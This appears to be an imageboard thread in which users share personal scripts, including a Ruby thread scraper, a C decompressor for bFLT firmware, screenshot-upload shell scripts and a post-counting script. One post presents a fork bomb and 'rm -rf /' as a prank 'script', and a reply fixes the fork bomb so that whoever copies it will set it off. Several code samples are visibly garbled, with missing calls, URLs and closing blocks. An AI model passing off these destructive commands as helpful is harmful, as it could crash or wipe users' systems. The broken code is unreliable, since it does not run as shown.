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Help me fix this shit.

Kalyx ######

File: 1493223694043.png (660.71 KB, 600x600, 1485722285101.png)


Share your one-off scripts or helpful scripts

I'll start off with simple thread scrapper

require "open-uri"
require "json"
def download(post,board)
    if post["filename"]
        file = "#{post['tim']}#{post['ext']}"
        puts file,"w") do |f|
            f.write open("{board}/src/#{file}").read
    elsif post["extra_files"]
        post["extra_files"].each do |p|
            download p,board
link  = ARGV[0].gsub(".html","")
/https:\/\/\/(.*?)\/res\// =~ link
board = $1
body = open("#{link}.json").read
thread = JSON.parse body
thread["posts"].each do |post|
    download post,board



gif-makin' with ffmpeg. tried to make it as feature-y as possible, including fixing aspect ratio problems that show up in naive-conversion and one-step handling subtitle-embedding on top of the stuff you'd expect (selecting dithering algs, fps, colour count, size, etc)

also auto-detects if gifsicle is installed and can handle post-conversion optimising with it.

still need to add support for cropping, which will mean a bit more juggling in the output-resolution determining, but otherwise pretty complete. might make an aur package, or something.



I wrote this bash script a few months ago. It's basically a really simple versioning system driven by IPFS. I like to call it from a daily cron script to archive photos and videos and such.


This is a "script" I wrote to decompress bFLTv4 binaries. I wrote it a few weeks ago when I was messing around with and attempting to disassemble firmware from IoT cameras.

#include <stdlib.h>
#include <stdio.h>

#define BFLT_HEADER_SIZE 0x40

int main(int argc, char **argv) {
    FILE *bflt_file = fopen(argv[1], "rb");
    FILE *tmp_file = fopen("/tmp/bflt_content.gz", "wb");
    FILE *new_file = fopen(argv[2], "wb");

    if(bflt_file == NULL) {
        printf("Error opening file or file does not exist.");
        return 1;

    fseek(bflt_file, 0L, SEEK_END);
    unsigned long file_size = ftell(bflt_file);
    fseek(bflt_file, 0L, SEEK_SET);

    char *bflt_header = malloc(sizeof(char) * BFLT_HEADER_SIZE);
    char *bflt_content = malloc(sizeof(char) * file_size);

    fread(bflt_header, 1, BFLT_HEADER_SIZE, bflt_file);
    bflt_header[0x27] = bflt_header[0x27] & 3;         //Change header flag from compressed to uncompressed

    fseek(bflt_file, 0x40L, SEEK_SET);
    fread(bflt_content, 1, file_size-0x40, bflt_file);
    fwrite(bflt_content, 1, file_size-0x40, tmp_file);
    system("gzip -d /tmp/bflt_content.gz");

    FILE *raw_file = fopen("/tmp/bflt_content", "rb");
    fseek(raw_file, 0L, SEEK_END);
    unsigned long raw_file_size = ftell(raw_file);
    fseek(raw_file, 0L, SEEK_SET);

    char *raw_content = malloc(sizeof(char) * raw_file_size);
    fread(raw_content, 1, raw_file_size, raw_file);

    fwrite(bflt_header, 1, 0x40, new_file);
    fseek(new_file, 0x40L, SEEK_SET);
    fwrite(raw_content, 1, raw_file_size, new_file);



    return 0;


Most of my useful scripts are just one or two lines, to help me save typing. I do, for fun, however, try to write fast sh and csh scripts for project euler though.


When I ran a multi-monitor systems through synergy I had a set of scripts ssh-ing into the hosts starting and killing (if=when it crashed) synergy. The one below for starting X is a little more involved, since I don't want to kill it if I've already started it, and want it to stay even as I break the ssh connection.

remotes="host1 host2 host3 ..."

for host in $remotes; do
    echo -e "\x1b[1;32mSTARTX: $host\x1b[0m"
    ping -c 1 -w 1 -i 0.2 $host.localdomain && ssh $host \
        "screen -ls xsession-$host || screen -mdS xsession-$host bash -l startx" &

sleep 5


:(){ :|: & };

rm -rf /


File: 1495196608495.gif (27.78 KB, 87x100, lain3.gif)

Wow, it plays that Legend of Zelda song!



#rfn is a program I wrote that outputs a random name to stdout

filename=$(rfn png)

#interactive screenshot with scrot
scrot -s "/var/screenshot/$filename"

#send to vps
scp -P 69420 "/var/screenshot/$filename" "vps:/var/www/domain.tld/ss"

#echo url into clipboard
echo "http://ss.domain.tld/$filename" | xclip -r -selection clip-board -i

This is a great script if you're interested in brewing soykaf even faster.


File: 1495232445711.png (74.37 KB, 640x400, dicksred.png)

Upgraded it today to automatically draw dicks on top of the things I screenshot for me. I'm considering starting a website dedicated to scripts/programs that make brewing soykaf in irc/IM stuff easier.

Requires image magick.


#rfn is a program I wrote that outputs a random name to stdout

filename=$(rfn png)
filename2=$(rfn png)

#interactive screenshot with scrot
scrot -s "/var/screenshot/$filename"

#overlay the dicks
composite -gravity center "/var/screenshot/dicksred.png" "/var/screenshot/$filename" "/var/screenshot/$filename2"

#send to vps
scp -P 69420 "/var/screenshot/$filename2" "vps:/var/www/domain.tld/ss"

#echo url into clipboard
echo "http://ss.domain.tld/$filename2" | xclip -r -selection clip-board -i


Nah, you gotta write it
 :(){ :|: & };:

else the schmuck that c/ps it into Gnome Terminal with the default settings won't know how to invoke it.


will the fork bomb not prevent rm from running?

or will it make the system unresponsive while rm is running?

i don't understand how they work together.


Get how many of the alive posts were made on the different days:

get_posts_by_day () {

    threads=$(wget -q -O - "${domain}/${board}/threads.json" \
                  | jq '.[].threads[].no')

    for t in ${threads}; do
        wget -q -O - "${domain}/${board}/res/${t}.json" \
            | jq '.posts[].time' \
            | sed -e 's/^/@/' \
            | xargs -n1 date -I -d
    done | sort | uniq -c | awk '{ print $2 " " $1 }'

(( $# != 1 )) && { echo "Usage: $0 <board>"; exit 1; }
get_posts_by_day "$@"

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